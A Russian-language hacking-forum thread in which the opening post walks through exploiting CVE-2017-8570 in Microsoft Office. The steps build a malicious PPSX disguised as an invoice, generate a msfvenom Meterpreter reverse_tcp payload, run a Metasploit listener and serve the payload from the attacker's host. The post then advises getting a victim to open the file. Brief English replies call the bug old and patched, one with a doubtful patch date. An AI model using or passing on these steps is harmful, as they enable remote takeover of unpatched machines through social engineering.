Уязвимость Microsoft Office CVE-2017-8570

Gidroponika

Exploit Developer
Joined
Aug 17, 2016
Messages
1,783
Reaction score
826
Всем привет. Сегодня разберем такую уязвимость как Microsoft Office CVE 2017 8570.



Данная уязвимость позволяет получить доступ к удаленной машине используя специально подготовленный файл PowerPoint, более подробно о ней можете почитать по ссылке:

https://www.rapid7.com/db/vulnerabilities/msft-cve-2017-8570.



Использована она может быть на следующих версиях:

  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2 (32-bit editions)
  • Microsoft Office 2010 Service Pack 2 (64-bit editions)
  • Microsoft Office 2013 RT Service Pack 1
  • Microsoft Office 2013 Service Pack 1 (32-bit editions)
  • Microsoft Office 2013 Service Pack 1 (64-bit editions)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office 2016 (64-bit edition)
На данный момент уязвимость устранена в текущих обновлениях, но, как мы знаем, что многие пренебрегают обновлениями, что нам конечно на руку.



И так поехали:

1. Заходим по ссылке https://github.com/tezukanice/Office8570 скачиваем, не забываем читать README.md , там будет рассмотрено три сценария атаки используя данную уязвимость. Мы в данной статье остановимся на первом сценарии.

9ce514b689865b93a02dd.png

Вкратце:

- генерируем наш вредоносный PPSX файл,

- создаем полезную нагрузку и запускаем слушатель.

- запускаем сервер на 80 порту.



Давайте непосредственно приступим к делу.

Создаем в директории «Office8570» новую папку и назовем ее «template», далее переносим файл template.ppsx в эту папку. Если этого не сделать то при генерировании PPSX файла выскочит ошибка.

0386662d61065b161b0f0.png

1.Сейчас генерируем наш PPSX файл, пишем в терминале в одну строчку следующее:

Code:
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.0.104/logo.doc



Не забываем вместо моего ip ставить свой, если кто не знает как узнать свой ip, делается это командой ifconfig. У вас должен появится файл Invoice.ppsx.

a0bc3057535e954b8bedc.png

2. Создаем полезную нагрузку,где будет создан файл shell.exe в каталоге tmp, в моем случае это будет выглядеть следующим образом:

Code:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -f exe > /tmp/shell.exe


Для создания полезной нагрузки можем использовать любой другой инструмент, не обязательно использовать msfvenom, главное перенести полезную нагрузку потом в каталог tmp.


Запускаем слушатель:

Code:
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.104; set LPORT 4444; run"


3. Далее в терминале пишем следующую строчку

Code:
python cve-2017-8570_toolkit.py -M exp -e http://192.168.0.104/shell.exe -l /tmp/shell.exe


по итогу, у нас запустится сервер на 80 порту.

Далее нам осталось впарить файл Invoice.ppsx , и как только его откроют ,с сервера погрузится наша полезная нагрузка.

Всем хорошего вечера и удачного пентеста!!!
 

IBV

New member
Joined
Nov 18, 2011
Messages
1
Reaction score
0
"Yo, anyone else get hit by this Office exploit back in the day? I remember it was a real pain to patch, but thankfully most of us were using 365 by then"
 

darchu

Member
Joined
Sep 14, 2005
Messages
37
Reaction score
116
"OP, you're talkin' about an oldie from 2017. Luckily, this one got patched a while back in March 2017, so most people shouldn't be exposed unless they're still on some outdated software."
 

electroshik

New member
Joined
Jun 13, 2009
Messages
1
Reaction score
0
"Yo, just a heads up, CVE-2017-8570 is an old vulnerability, patched by Microsoft back in 2017. Still worth keeping an eye on if you're running legacy Office versions, but it's not something you need to lose sleep over today. Anyone else still on outdated Office versions?"
 
Top